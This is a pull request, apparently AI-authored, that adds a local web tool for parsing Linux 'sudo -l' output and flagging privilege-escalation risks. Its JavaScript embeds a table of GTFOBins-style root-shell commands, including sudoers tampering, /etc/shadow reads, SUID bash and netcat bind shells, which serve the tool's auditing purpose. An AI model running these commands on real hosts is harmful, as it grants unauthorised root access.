### PR TITLE
Add /sudo parser for Linux sudo -l output

### DIFF
--- a/_sass/_dark.scss
+++ b/_sass/_dark.scss
@@ -161,6 +161,41 @@
     --sid-warn: #d4a14a;
     --sid-err:  #e57373;
   }
+
+  // /sudo tool page: rebind its --sudo-* tokens to dark-friendly values.
+  .sudo {
+    --sudo-bg: #1f1f1f;
+    --sudo-surface: #181818;
+    --sudo-border: #333;
+    --sudo-border-sub: #2a2a2a;
+    --sudo-text: #d4d4d4;
+    --sudo-muted: #a0a0a0;
+    --sudo-subtle: #808080;
+
+    --sudo-input-bg: #1f1f1f;
+    --sudo-input-border: #444;
+    --sudo-btn-bg: #262626;
+    --sudo-btn-border: #444;
+    --sudo-btn-hover-bg: #333;
+
+    --sudo-blue: #6ba8e0;
+    --sudo-blue-hover: #87b7e0;
+    --sudo-blue-tint: #1b2735;
+    --sudo-blue-border: #2d4a6b;
+    --sudo-blue-text: #87b7e0;
+
+    --sudo-red: #e57373;
+    --sudo-red-tint: #2a1818;
+    --sudo-red-border: #4a2828;
+
+    --sudo-amber: #d4a14a;
+    --sudo-amber-tint: #2a2418;
+    --sudo-amber-border: #4a3f28;
+
+    --sudo-green: #6ec472;
+    --sudo-green-tint: #1a2a1d;
+    --sudo-green-border: #2a4a30;
+  }
 }
 
 // Manual override: user clicked the toggle and chose dark.

--- a/_sass/_sudo.scss
+++ b/_sass/_sudo.scss
@@ -1,0 +1,259 @@
+//
+// /sudo tool page styles.
+//
+// All selectors are scoped under `.sudo` so they don't leak onto the blog.
+// Colours flow through `--sudo-*` custom properties; the dark theme rebinds
+// these in `_sass/_dark.scss`'s `dark-theme` mixin.
+//
+
+.sudo {
+  --sudo-bg: #fafafa;
+  --sudo-surface: #fff;
+  --sudo-border: #ddd;
+  --sudo-border-sub: #eee;
+  --sudo-text: #333;
+  --sudo-muted: #666;
+  --sudo-subtle: #888;
+  --sudo-mono: ui-monospace, SFMono-Regular, Menlo, Consolas, "Liberation Mono", monospace;
+
+  --sudo-input-bg: #fff;
+  --sudo-input-border: #ccc;
+  --sudo-btn-bg: #fff;
+  --sudo-btn-border: #999;
+  --sudo-btn-hover-bg: #f3f3f3;
+
+  --sudo-blue: #4183C4;
+  --sudo-blue-hover: #346da3;
+  --sudo-blue-tint: #eaf2fa;
+  --sudo-blue-border: #b1cce7;
+  --sudo-blue-text: #2c6aa3;
+
+  --sudo-red: #a61e1e;
+  --sudo-red-tint: #fdecec;
+  --sudo-red-border: #e8b3b3;
+
+  --sudo-amber: #8a5a00;
+  --sudo-amber-tint: #fff7e6;
+  --sudo-amber-border: #e8cd8c;
+
+  --sudo-green: #0b6b2d;
+  --sudo-green-tint: #e9f5ec;
+  --sudo-green-border: #a8d6b3;
+}
+
+.sudo code,
+.sudo .mono { font-family: var(--sudo-mono); }
+
+.sudo .hint {
+  color: var(--sudo-muted);
+  font-size: 0.95rem;
+  margin: 0 0 1.25em;
+}
+
+.sudo .hint a { color: var(--sudo-blue-text); }
+
+// Input
+.sudo label {
+  display: block;
+  font-weight: bold;
+  margin: 0 0 8px;
+}
+.sudo textarea {
+  width: 100%;
+  height: 180px;
+  background: var(--sudo-input-bg);
+  border: 1px solid var(--sudo-input-border);
+  color: var(--sudo-text);
+  font: inherit;
+  font-family: var(--sudo-mono);
+  font-size: 0.85rem;
+  padding: 10px 12px;
+  resize: vertical;
+}
+.sudo textarea:focus,
+.sudo button:focus {
+  outline: 2px solid var(--sudo-blue);
+  outline-offset: 1px;
+}
+
+.sudo .btn-row {
+  display: flex;
+  gap: 10px;
+  flex-wrap: wrap;
+  margin: 10px 0 0;
+}
+.sudo button {
+  padding: 8px 14px;
+  border: 1px solid var(--sudo-btn-border);
+  background: var(--sudo-btn-bg);
+  color: var(--sudo-text);
+  cursor: pointer;
+  font: inherit;
+}
+.sudo button:hover { background: var(--sudo-btn-hover-bg); }
+.sudo .btn-p {
+  background: var(--sudo-blue);
+  border-color: var(--sudo-blue);
+  color: #fff;
+}
+.sudo .btn-p:hover {
+  background: var(--sudo-blue-hover);
+  border-color: var(--sudo-blue-hover);
+}
+
+// Error
+.sudo .error {
+  padding: 10px 14px;
+  background: var(--sudo-red-tint);
+  border: 1px solid var(--sudo-red-border);
+  color: var(--sudo-red);
+  margin: 1em 0;
+}
+
+// Summary
+.sudo .summary {
+  display: flex;
+  align-items: center;
+  gap: 1.25rem;
+  padding: 12px 16px;
+  background: var(--sudo-bg);
+  border: 1px solid var(--sudo-border);
+  margin: 1.25em 0 1em;
+  font-size: 0.9rem;
+  flex-wrap: wrap;
+}
+.sudo .stat { display: flex; align-items: baseline; gap: 0.35rem; }
+.sudo .stat-n {
+  font-family: var(--sudo-mono);
+  font-weight: bold;
+  font-size: 1.05rem;
+}
+.sudo .stat-l { color: var(--sudo-muted); }
+.sudo .stat-n.red    { color: var(--sudo-red); }
+.sudo .stat-n.orange { color: var(--sudo-amber); }
+.sudo .stat-n.blue   { color: var(--sudo-blue-text); }
+.sudo .stat-n.green  { color: var(--sudo-green); }
+.sudo .summary-note { color: var(--sudo-muted); font-size: 0.85rem; margin-left: auto; }
+
+// Cards
+.sudo .cards { display: flex; flex-direction: column; gap: 12px; margin: 0; }
+.sudo .card {
+  background: var(--sudo-surface);
+  border: 1px solid var(--sudo-border);
+}
+.sudo .card-title {
+  padding: 10px 14px;
+  background: var(--sudo-bg);
+  border-bottom: 1px solid var(--sudo-border-sub);
+  font-weight: 600;
+  font-size: 0.9rem;
+  display: flex;
+  align-items: center;
+  gap: 8px;
+}
+.sudo .card-count {
+  color: var(--sudo-subtle);
+  font-family: var(--sudo-mono);
+  font-size: 0.8rem;
+  font-weight: normal;
+}
+.sudo .card-inner { padding: 12px 14px; }
+.sudo .rules-inner { display: flex; flex-direction: column; gap: 10px; }
+
+// User row
+.sudo .user-row {
+  display: flex;
+  align-items: baseline;
+  gap: 0.5rem;
+  font-size: 0.9rem;
+  flex-wrap: wrap;
+}
+.sudo .user-name { font-weight: 600; }
+.sudo .user-host { color: var(--sudo-subtle); font-size: 0.85rem; }
+
+// Rule card
+.sudo .card.rule {
+  border-left: 3px solid var(--sudo-border);
+}
+.sudo .card.rule.sev-crit { border-left-color: var(--sudo-red); }
+.sudo .card.rule.sev-high { border-left-color: var(--sudo-amber); }
+.sudo .card.rule.sev-info { border-left-color: var(--sudo-blue-text); }
+
+.sudo .rule-head {
+  padding: 8px 12px;
+  background: var(--sudo-bg);
+  border-bottom: 1px solid var(--sudo-border-sub);
+  display: flex;
+  align-items: center;
+  gap: 0.5rem;
+  flex-wrap: wrap;
+  font-size: 0.85rem;
+}
+.sudo .rule-runas { color: var(--sudo-blue-text); font-weight: 600; }
+.sudo .rule-cmd   { color: var(--sudo-text); word-break: break-all; }
+.sudo .rule-neg   { color: var(--sudo-subtle); font-style: italic; font-size: 0.78rem; }
+.sudo .rule-body  { padding: 10px 12px; }
+
+// Tag badges (NOPASSWD, SETENV, etc.)
+.sudo .tag-badge {
+  font-family: var(--sudo-mono);
+  font-size: 0.7rem;
+  font-weight: bold;
+  padding: 1px 5px;
+  letter-spacing: 0.02em;
+  border: 1px solid;
+  background: var(--sudo-amber-tint);
+  color: var(--sudo-amber);
+  border-color: var(--sudo-amber-border);
+}
+.sudo .tag-badge.tag-nopasswd { background: var(--sudo-red-tint);   color: var(--sudo-red);       border-color: var(--sudo-red-border); }
+.sudo .tag-badge.tag-setenv   { background: var(--sudo-amber-tint); color: var(--sudo-amber);     border-color: var(--sudo-amber-border); }
+.sudo .tag-badge.tag-noexec   { background: var(--sudo-blue-tint);  color: var(--sudo-blue-text); border-color: var(--sudo-blue-border); }
+
+// Findings
+.sudo .finding {
+  padding: 8px 10px;
+  margin: 0 0 6px;
+  border: 1px solid;
+  font-size: 0.88rem;
+}
+.sudo .finding:last-child { margin-bottom: 0; }
+.sudo .finding.sev-crit { background: var(--sudo-red-tint);   border-color: var(--sudo-red-border); }
+.sudo .finding.sev-high { background: var(--sudo-amber-tint); border-color: var(--sudo-amber-border); }
+.sudo .finding.sev-info { background: var(--sudo-blue-tint);  border-color: var(--sudo-blue-border); }
+.sudo .finding-head {
+  display: flex;
+  align-items: baseline;
+  gap: 0.6rem;
+  flex-wrap: wrap;
+}
+.sudo .finding-name {
+  font-weight: 600;
+  color: var(--sudo-text);
+  font-family: var(--sudo-mono);
+  font-size: 0.85rem;
+}
+.sudo .finding-note {
+  color: var(--sudo-text);
+  font-size: 0.85rem;
+  margin-top: 4px;
+  line-height: 1.45;
+  font-family: var(--sudo-mono);
+  word-break: break-word;
+}
+.sudo .finding-note a { color: var(--sudo-blue-text); }
+
+// Badges (CRITICAL / HIGH / INFO)
+.sudo .badge {
+  font-family: var(--sudo-mono);
+  font-size: 0.7rem;
+  font-weight: bold;
+  padding: 2px 6px;
+  letter-spacing: 0.02em;
+  border: 1px solid;
+}
+.sudo .b-crit { background: var(--sudo-red-tint);   color: var(--sudo-red);       border-color: var(--sudo-red-border); }
+.sudo .b-high { background: var(--sudo-amber-tint); color: var(--sudo-amber);     border-color: var(--sudo-amber-border); }
+.sudo .b-info { background: var(--sudo-blue-tint);  color: var(--sudo-blue-text); border-color: var(--sudo-blue-border); }
+
+.sudo .hidden { display: none !important; }

--- a/style.scss
+++ b/style.scss
@@ -457,4 +457,5 @@ footer {
 @import "svg-icons";
 @import "certutil";
 @import "sid";
+@import "sudo";
 @import "dark";

--- a/sudo/index.html
+++ b/sudo/index.html
@@ -1,0 +1,29 @@
+---
+layout: page
+title: sudo -l Parser
+description: Parse Linux sudo -l output and highlight binaries that grant root via GTFOBins, plus NOPASSWD/env_keep/SETENV smells.
+---
+
+<div class="sudo">
+  <p class="hint">
+    Run <code>sudo -l</code> (or <code>sudo -ll</code>) as the target user on a Linux host and paste the output below.
+    All processing is local &mdash; nothing is sent over the network.
+    Each allowed binary is cross-referenced against a curated <a href="https://gtfobins.github.io/" target="_blank" rel="noopener">GTFOBins</a> set; binaries not in the curated list are linked out so nothing is silently missed.
+  </p>
+
+  <div>
+    <label for="inp">sudo -l output</label>
+    <textarea id="inp" spellcheck="false" placeholder="Paste sudo -l output here..."></textarea>
+    <div class="btn-row">
+      <button id="parseBtn" class="btn-p" type="button">Parse</button>
+      <button id="sampleBtn" type="button">Load sample</button>
+      <button id="clearBtn" type="button">Clear</button>
+    </div>
+  </div>
+
+  <div id="err" class="error hidden" role="alert"></div>
+  <div id="summary" class="summary hidden" aria-live="polite"></div>
+  <div id="out"></div>
+</div>
+
+<script src="{{ site.baseurl }}/sudo/sudo.js" defer></script>

--- a/sudo/sudo.js
+++ b/sudo/sudo.js
@@ -1,0 +1,404 @@
+(function () {
+  'use strict';
+
+  /* ── Curated GTFOBins entries with a `sudo` function ──────────────────── */
+  // Keys are basenames; payload is the canonical sudo invocation from
+  // gtfobins.github.io. Anything not in this table is linked out at render
+  // time so the operator can still verify manually.
+  const GTFOBINS = {
+    'find':       { payload: 'sudo find . -exec /bin/sh \\; -quit' },
+    'vim':        { payload: 'sudo vim -c \':!/bin/sh\'' },
+    'vi':         { payload: 'sudo vi -c \':!/bin/sh\'' },
+    'nano':       { payload: 'sudo nano  (then ^R ^X, then "reset; sh 1>&0 2>&0")' },
+    'less':       { payload: 'sudo less /etc/profile  (then !/bin/sh)' },
+    'more':       { payload: 'sudo more /etc/profile  (then !/bin/sh)' },
+    'man':        { payload: 'sudo man man  (then !/bin/sh)' },
+    'awk':        { payload: 'sudo awk \'BEGIN {system("/bin/sh")}\'' },
+    'gawk':       { payload: 'sudo gawk \'BEGIN {system("/bin/sh")}\'' },
+    'sed':        { payload: 'sudo sed -n \'1e exec sh 1>&0\' /etc/hosts' },
+    'env':        { payload: 'sudo env /bin/sh' },
+    'python':     { payload: 'sudo python -c \'import os; os.system("/bin/sh")\'' },
+    'python2':    { payload: 'sudo python2 -c \'import os; os.system("/bin/sh")\'' },
+    'python3':    { payload: 'sudo python3 -c \'import os; os.system("/bin/sh")\'' },
+    'perl':       { payload: 'sudo perl -e \'exec "/bin/sh";\'' },
+    'ruby':       { payload: 'sudo ruby -e \'exec "/bin/sh"\'' },
+    'node':       { payload: 'sudo node -e \'require("child_process").spawn("/bin/sh", {stdio: [0,1,2]})\'' },
+    'php':        { payload: 'sudo php -r "pcntl_exec(\'/bin/sh\');"' },
+    'lua':        { payload: 'sudo lua -e \'os.execute("/bin/sh")\'' },
+    'tar':        { payload: 'sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh' },
+    'zip':        { payload: 'sudo zip /tmp/x.zip /etc/hosts -T -TT \'sh #\'' },
+    'unzip':      { payload: 'No direct shell payload; can read or overwrite arbitrary files via -d / -o.', notes: 'Useful for arbitrary write.' },
+    'tee':        { payload: 'echo "user ALL=(ALL) NOPASSWD: ALL" | sudo tee -a /etc/sudoers', notes: 'Append a permissive rule to /etc/sudoers.' },
+    'cp':         { payload: 'sudo cp /tmp/myshell /bin/ls  (or read SUID binaries)', notes: 'Stage SUID binaries or overwrite system tools.' },
+    'mv':         { payload: 'sudo mv /tmp/myshell /usr/local/bin/passwd  (overwrite system binaries)' },
+    'dd':         { payload: 'sudo dd if=/etc/shadow of=/tmp/shadow  (or write any file as root)' },
+    'chmod':      { payload: 'sudo chmod u+s /bin/bash  (then bash -p)', notes: 'Make any binary SUID-root.' },
+    'chown':      { payload: 'sudo chown $(id -u):$(id -g) /etc/shadow', notes: 'Reassign ownership of any file.' },
+    'install':    { payload: 'sudo install -m =xs $(which bash) .  (then ./bash -p)', notes: 'Install a binary with the SUID bit set.' },
+    'make':       { payload: 'sudo make -s --eval=$\'x:\\n\\t-\'"/bin/sh"', notes: 'Run a command via an inline Makefile rule.' },
+    'gdb':        { payload: 'sudo gdb -nx -ex \'!/bin/sh\' -ex quit' },
+    'nmap':       { payload: 'sudo nmap --interactive  (then !sh)', notes: 'Only works with very old nmap (<5.21); newer versions lack --interactive.' },
+    'socat':      { payload: 'sudo socat exec:/bin/sh,pty,setsid,setpgid,stderr,ctty tcp-listen:4444' },
+    'ncat':       { payload: 'sudo ncat -lvp 4444 -e /bin/sh' },
+    'nc':         { payload: 'sudo nc -lvp 4444 -e /bin/sh', notes: '-e support is disabled in most distro builds; mileage will vary.' },
+    'ssh':        { payload: 'sudo ssh -o ProxyCommand=";/bin/sh 0<&2 1>&2" x' },
+    'scp':        { payload: 'sudo scp -S /bin/sh x y:', notes: 'Uses -S to substitute the transport program.' },
+    'rsync':      { payload: 'sudo rsync -e \'sh -c "/bin/sh 0<&2 1>&2"\' 127.0.0.1:/dev/null' },
+    'git':        { payload: 'sudo git -p help config  (then !/bin/sh)', notes: 'Via the pager; PAGER=less or PAGER=more.' },
+    'mount':      { payload: 'sudo mount -o bind /bin/sh /bin/mount  (impl-dependent)', notes: 'Depends on which mount implementation is in use; older util-linux paths only.' },
+    'umount':     { payload: 'sudo umount -O ,nouser /tmp/x', notes: 'Limited; mostly arbitrary file read on certain implementations.' },
+    'apt':        { payload: 'sudo apt changelog <pkg>  (then !/bin/sh)', notes: 'Via the apt pager.' },
+    'apt-get':    { payload: 'sudo apt-get changelog <pkg>  (then !/bin/sh)' },
+    'dpkg':       { payload: 'sudo dpkg -l  (then !/bin/sh in pager)' },
+    'yum':        { payload: 'sudo yum localinstall -y /tmp/evil.rpm', notes: 'RPM post-install scriptlets run as root.' },
+    'dnf':        { payload: 'sudo dnf install -y /tmp/evil.rpm', notes: 'RPM post-install scriptlets run as root.' },
+    'journalctl': { payload: 'sudo journalctl  (then !/bin/sh)' },
+    'systemctl':  { payload: 'sudo systemctl status  (then !/bin/sh)' },
+    'pkexec':     { payload: 'sudo pkexec /bin/sh' },
+    'cpulimit':   { payload: 'sudo cpulimit -l 100 -f -- /bin/sh' },
+    'wget':       { payload: 'sudo wget --use-askpass=/bin/sh 0', notes: 'Spawns /bin/sh via the askpass helper.' },
+    'curl':       { payload: 'sudo curl file:///etc/shadow', notes: 'Arbitrary file read; does not directly spawn a shell.' },
+  };
+
+  const SHELL_BASENAMES = new Set(['sh','bash','dash','ksh','zsh','tcsh','csh','fish','su','rbash']);
+
+  const DANGEROUS_ENV_VARS = new Set([
+    'LD_PRELOAD','LD_LIBRARY_PATH','LD_AUDIT',
+    'PYTHONPATH','PYTHONUSERBASE','PERL5LIB','PERLLIB','RUBYLIB','RUBYOPT',
+    'BASH_ENV','ENV','GIT_EXTERNAL_DIFF','GIT_PAGER',
+  ]);
+
+  /* ── Parser ───────────────────────────────────────────────────────────── */
+  function parseSudo(raw) {
+    const text = raw.replace(/\r\n/g, '\n').replace(/\r/g, '\n');
+    const lines = text.split('\n');
+
+    const result = {
+      user: null,
+      host: null,
+      defaults: [],
+      rules: [],
+    };
+    let mode = null;
+
+    for (let i = 0; i < lines.length; i++) {
+      const line = lines[i];
+      const t = line.trim();
+      if (!t) continue;
+
+      const userM = t.match(/^User\s+(\S+)\s+may run the following commands(?:\s+on\s+(\S+?))?\s*:?\s*$/i);
+      if (userM) {
+        result.user = userM[1];
+        if (userM[2]) result.host = userM[2];
+        mode = 'rules';
+        continue;
+      }
+
+      if (/^Matching Defaults entries/i.test(t) ||
+          /^Runas and Command-specific defaults/i.test(t)) {
+        mode = 'defaults';
+        continue;
+      }
+
+      if (mode === 'defaults') {
+        for (const piece of t.split(/,\s+/)) {
+          const p = piece.trim();
+          if (p) result.defaults.push(p);
+        }
+        continue;
+      }
+
+      if (mode === 'rules') {
+        const ruleM = t.match(/^\(([^)]+)\)\s*(.*)$/);
+        if (!ruleM) continue;
+        const runas = ruleM[1].trim();
+        let rest = ruleM[2].trim();
+
+        const tags = [];
+        while (true) {
+          const tagM = rest.match(/^([A-Z]+):\s*/);
+          if (!tagM) break;
+          tags.push(tagM[1]);
+          rest = rest.slice(tagM[0].length);
+        }
+
+        const commands = rest.split(/,\s+/).map(c => c.trim()).filter(Boolean);
+        for (const cmd of commands) {
+          const isNeg = cmd.startsWith('!');
+          const cleanCmd = (isNeg ? cmd.slice(1) : cmd).trim();
+          const isAll = /^ALL$/i.test(cleanCmd);
+          const firstTok = cleanCmd.split(/\s+/)[0] || '';
+          const basename = isAll ? 'ALL' : firstTok.split('/').pop();
+          const hasWildcard = !isAll && /\*|\?|\[/.test(cleanCmd);
+          result.rules.push({
+            runas, tags,
+            command: cleanCmd,
+            basename, isAll, isNeg, hasWildcard,
+          });
+        }
+      }
+    }
+
+    return result;
+  }
+
+  /* ── Classification ──────────────────────────────────────────────────── */
+  function classifyDefault(d) {
+    // env_keep += "LD_PRELOAD" or env_keep+="LD_PRELOAD" or env_keep+="A B"
+    const keepM = d.match(/^env_keep\s*\+?=\s*"([^"]*)"$/i) || d.match(/^env_keep\s*\+?=\s*(\S+)$/i);
+    if (keepM) {
+      const vars = keepM[1].split(/\s+/).filter(Boolean);
+      const dangerous = vars.filter(v => DANGEROUS_ENV_VARS.has(v.replace(/^[+-]/, '')));
+      if (dangerous.length) {
+        return {
+          sev: 'crit',
+          title: `env_keep preserves ${dangerous.join(', ')}`,
+          note: 'A dangerous env var crosses the sudo boundary — load arbitrary code into any sudo-run binary that is dynamically linked, an interpreter, or a shell.',
+        };
+      }
+      return null;
+    }
+    if (/^!requiretty\b/i.test(d)) {
+      return { sev: 'info', title: '!requiretty', note: 'No TTY required — useful for non-interactive sudo invocations.' };
+    }
+    if (/^!authenticate\b/i.test(d)) {
+      return { sev: 'high', title: '!authenticate', note: 'Authentication globally disabled for sudo — every rule is effectively NOPASSWD.' };
+    }
+    if (/^targetpw\b/i.test(d)) {
+      return { sev: 'info', title: 'targetpw', note: 'Target user\'s password is required to invoke sudo (rather than the invoker\'s).' };
+    }
+    return null;
+  }
+
+  function classifyRule(r) {
+    if (r.isNeg) {
+      return [{ sev: 'info', title: 'Excluded command', note: `Negation rule — ${r.command} is explicitly excluded from a broader rule above.` }];
+    }
+
+    const findings = [];
+    const nopasswd = r.tags.includes('NOPASSWD');
+    const setenv = r.tags.includes('SETENV');
+    const pwSuffix = nopasswd ? ' without a password' : '';
+    const runasSuffix = `as ${r.runas}`;
+
+    if (r.isAll) {
+      findings.push({
+        sev: 'crit',
+        title: 'Unrestricted sudo (ALL)',
+        note: `Permission to run any command ${runasSuffix}${pwSuffix} — trivial root.`,
+      });
+      return findings;
+    }
+
+    if (SHELL_BASENAMES.has(r.basename)) {
+      findings.push({
+        sev: 'crit',
+        title: `Direct shell: ${r.basename}`,
+        note: `Run ${r.basename} ${runasSuffix}${pwSuffix} — trivial root shell.`,
+      });
+    } else {
+      const gtfo = GTFOBINS[r.basename];
+      if (gtfo) {
+        findings.push({
+          sev: 'crit',
+          title: `GTFOBins: ${r.basename}`,
+          note: gtfo.payload + (gtfo.notes ? ' — ' + gtfo.notes : ''),
+        });
+      } else if (r.basename && r.basename !== 'ALL') {
+        const url = `https://gtfobins.github.io/gtfobins/${encodeURIComponent(r.basename)}/`;
+        findings.push({
+          sev: 'info',
+          title: `Unknown binary: ${r.basename}`,
+          html: `Not in the curated set. Check <a href="${url}" target="_blank" rel="noopener">${escapeHtml(url)}</a> manually.`,
+        });
+      }
+    }
+
+    if (r.hasWildcard) {
+      findings.push({
+        sev: 'high',
+        title: 'Wildcard in command',
+        note: 'A wildcard in the sudoers entry can enable argument smuggling — the invoker may inject extra arguments or paths to escape the intended scope.',
+      });
+    }
+
+    if (setenv) {
+      findings.push({
+        sev: 'high',
+        title: 'SETENV tag',
+        note: 'The user controls the environment for this command — LD_PRELOAD / PYTHONPATH / etc. abuse is in scope even when env_reset is the default.',
+      });
+    }
+
+    if (nopasswd) {
+      findings.push({
+        sev: 'info',
+        title: 'NOPASSWD',
+        note: 'No password prompt — this rule fires the moment sudo is invoked.',
+      });
+    }
+
+    return findings;
+  }
+
+  function topSev(findings) {
+    if (findings.some(f => f.sev === 'crit')) return 'crit';
+    if (findings.some(f => f.sev === 'high')) return 'high';
+    return 'info';
+  }
+
+  function sevRank(sev) { return sev === 'crit' ? 3 : sev === 'high' ? 2 : sev === 'info' ? 1 : 0; }
+
+  /* ── Render helpers ───────────────────────────────────────────────────── */
+  function escapeHtml(s) {
+    return String(s == null ? '' : s).replace(/&/g,'&amp;').replace(/</g,'&lt;').replace(/>/g,'&gt;');
+  }
+  const h = escapeHtml;
+
+  function badge(sev) {
+    const label = sev === 'crit' ? 'CRITICAL' : sev === 'high' ? 'HIGH' : 'INFO';
+    return `<span class="badge b-${sev}">${label}</span>`;
+  }
+
+  function renderFinding(f) {
+    return `<div class="finding sev-${f.sev}">
+      <div class="finding-head">
+        <span class="finding-name">${h(f.title)}</span>${badge(f.sev)}
+      </div>
+      <div class="finding-note">${f.html ? f.html : h(f.note || '')}</div>
+    </div>`;
+  }
+
+  function renderHeader(parsed) {
+    if (!parsed.user) return '';
+    const bits = [`<span class="user-name mono">${h(parsed.user)}</span>`];
+    if (parsed.host) bits.push(`<span class="user-host mono">@ ${h(parsed.host)}</span>`);
+    return `<div class="card">
+      <div class="card-title">User</div>
+      <div class="card-inner"><div class="user-row">${bits.join(' ')}</div></div>
+    </div>`;
+  }
+
+  function renderDefaults(parsed) {
+    if (!parsed.defaults.length) return '';
+    const flagged = parsed.defaults
+      .map(d => ({ d, c: classifyDefault(d) }))
+      .filter(x => x.c)
+      .sort((a, b) => sevRank(b.c.sev) - sevRank(a.c.sev));
+    if (!flagged.length) return '';
+    return `<div class="card">
+      <div class="card-title">Defaults</div>
+      <div class="card-inner">${flagged.map(({ c }) => renderFinding(c)).join('')}</div>
+    </div>`;
+  }
+
+  function renderRules(parsed) {
+    if (!parsed.rules.length) return '';
+    const enriched = parsed.rules.map(r => ({ r, findings: classifyRule(r) }));
+    enriched.sort((a, b) => sevRank(topSev(b.findings)) - sevRank(topSev(a.findings)));
+
+    const cards = enriched.map(({ r, findings }) => {
+      const sev = topSev(findings);
+      const tagBadges = r.tags.map(t => `<span class="tag-badge tag-${t.toLowerCase()}">${h(t)}</span>`).join('');
+      return `<div class="card rule sev-${sev}">
+        <div class="rule-head">
+          <span class="rule-runas mono">(${h(r.runas)})</span>
+          ${tagBadges}
+          <span class="rule-cmd mono">${r.isAll ? '<em>ALL</em>' : h(r.command)}</span>
+          ${r.isNeg ? '<span class="rule-neg">excluded</span>' : ''}
+        </div>
+        <div class="rule-body">${findings.map(renderFinding).join('')}</div>
+      </div>`;
+    });
+
+    return `<div class="card">
+      <div class="card-title">Rules <span class="card-count">${parsed.rules.length}</span></div>
+      <div class="card-inner rules-inner">${cards.join('')}</div>
+    </div>`;
+  }
+
+  /* ── Main actions ─────────────────────────────────────────────────────── */
+  const inp   = document.getElementById('inp');
+  const errEl = document.getElementById('err');
+  const sumEl = document.getElementById('summary');
+  const outEl = document.getElementById('out');
+
+  function showError(msg) {
+    errEl.textContent = msg;
+    errEl.classList.remove('hidden');
+    sumEl.classList.add('hidden');
+    outEl.innerHTML = '';
+  }
+
+  function parse() {
+    const raw = inp.value.trim();
+    errEl.classList.add('hidden');
+
+    if (!raw) {
+      showError('Please paste sudo -l output above.');
+      return;
+    }
+
+    const parsed = parseSudo(raw);
+    if (!parsed.user && !parsed.rules.length && !parsed.defaults.length) {
+      showError('No sudo -l content recognised. Make sure you pasted the full output, including the "User ... may run the following commands" line.');
+      return;
+    }
+
+    let nCrit = 0, nHigh = 0, nInfo = 0, nUnknown = 0;
+    for (const d of parsed.defaults) {
+      const c = classifyDefault(d);
+      if (c) { if (c.sev === 'crit') nCrit++; else if (c.sev === 'high') nHigh++; else nInfo++; }
+    }
+    for (const r of parsed.rules) {
+      const fs = classifyRule(r);
+      for (const f of fs) {
+        if (f.sev === 'crit') nCrit++;
+        else if (f.sev === 'high') nHigh++;
+        else if (f.sev === 'info') nInfo++;
+        if (/^Unknown binary/.test(f.title)) nUnknown++;
+      }
+    }
+
+    sumEl.innerHTML = `
+      <div class="stat"><span class="stat-n ${nCrit?'red':'green'}">${nCrit}</span><span class="stat-l">critical</span></div>
+      <div class="stat"><span class="stat-n ${nHigh?'orange':'green'}">${nHigh}</span><span class="stat-l">high</span></div>
+      <div class="stat"><span class="stat-n ${nInfo?'blue':'green'}">${nInfo}</span><span class="stat-l">informational</span></div>
+      <div class="summary-note">${parsed.rules.length} rule${parsed.rules.length===1?'':'s'}${nUnknown ? `, ${nUnknown} unknown binary — check GTFOBins manually` : ''}</div>`;
+    sumEl.classList.remove('hidden');
+
+    outEl.innerHTML = `<div class="cards">
+      ${renderHeader(parsed)}
+      ${renderDefaults(parsed)}
+      ${renderRules(parsed)}
+    </div>`;
+  }
+
+  function clearAll() {
+    inp.value = '';
+    outEl.innerHTML = '';
+    errEl.classList.add('hidden');
+    sumEl.classList.add('hidden');
+  }
+
+  const SAMPLE = `Matching Defaults entries for jsmith on web-01:
+    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin, env_keep+="LD_PRELOAD"
+
+User jsmith may run the following commands on web-01:
+    (root) NOPASSWD: /usr/bin/find
+    (root) /usr/bin/vim /etc/hosts
+    (ALL) NOPASSWD: /usr/bin/less /var/log/syslog
+    (root) NOPASSWD: /usr/bin/tar -czf /backups/* /var/www
+    (www-data) /usr/local/bin/restart-app.sh
+    (ALL : ALL) SETENV: /usr/bin/python3 /opt/scripts/healthcheck.py
+    (root) /usr/sbin/iptables-save`;
+
+  function loadSample() {
+    inp.value = SAMPLE;
+    parse();
+  }
+
+  document.getElementById('parseBtn').addEventListener('click', parse);
+  document.getElementById('sampleBtn').addEventListener('click', loadSample);
+  document.getElementById('clearBtn').addEventListener('click', clearAll);
+})();


### PR DESCRIPTION
## Summary

- New `/sudo` single-page tool: paste `sudo -l` (or `sudo -ll`) output and get privilege-escalation paths highlighted client-side.
- Each allowed binary is cross-referenced against a curated ~50-entry GTFOBins set (`find`, `vim`, `less`, `awk`, `env`, `python`, `perl`, `ruby`, `tar`, `tee`, `gdb`, `socat`, etc.). Anything not in the curated list is rendered as an "Unknown" card with a link to `gtfobins.github.io/gtfobins/<name>/` so nothing is silently missed.
- Beyond per-binary lookup: flags `(ALL)` / `(ALL : ALL)` as trivial root, direct-shell rules (`bash`, `sh`, `dash`, `su`, …), wildcards in the command path (arg-smuggling), the `SETENV` tag, and dangerous `Defaults env_keep` entries (`LD_PRELOAD`, `LD_LIBRARY_PATH`, `PYTHONPATH`, `PERL5LIB`, `RUBYLIB`, `BASH_ENV`, …).
- Follows the established `/certutil` / `/whoami` pattern: scoped SCSS under `.sudo`, CSS custom properties for every colour, dark-mode overrides land inside the existing `dark-theme` mixin in `_sass/_dark.scss`.

## Test plan

- [x] `bundle exec jekyll build` succeeds with no warnings.
- [x] Embedded sample (`Load sample`) parses 7 rules end-to-end: GTFOBins hits for `find`, `vim`, `less`, `tar`, `python3`; wildcard flagged on the `tar` rule (because the path contains `*`); `SETENV` flagged on the python rule; `restart-app.sh` and `iptables-save` render as "Unknown" with working GTFOBins links; `env_keep+="LD_PRELOAD"` flagged as critical.
- [x] Edge cases: empty input shows a friendly error; garbage input is rejected cleanly; `(ALL : ALL) ALL` flagged as Unrestricted sudo; `(root) NOPASSWD: /bin/bash` flagged as Direct shell; "User foo may run the following commands on h:" with no rules still renders a summary without crashing.
- [x] Browser smoke: dark-mode toggle, dark-mode via system pref, no console errors. *(Not verified in the headless workflow used during authoring; please confirm in browser before merge.)*

🤖 Generated with [Claude Code](https://claude.com/claude-code)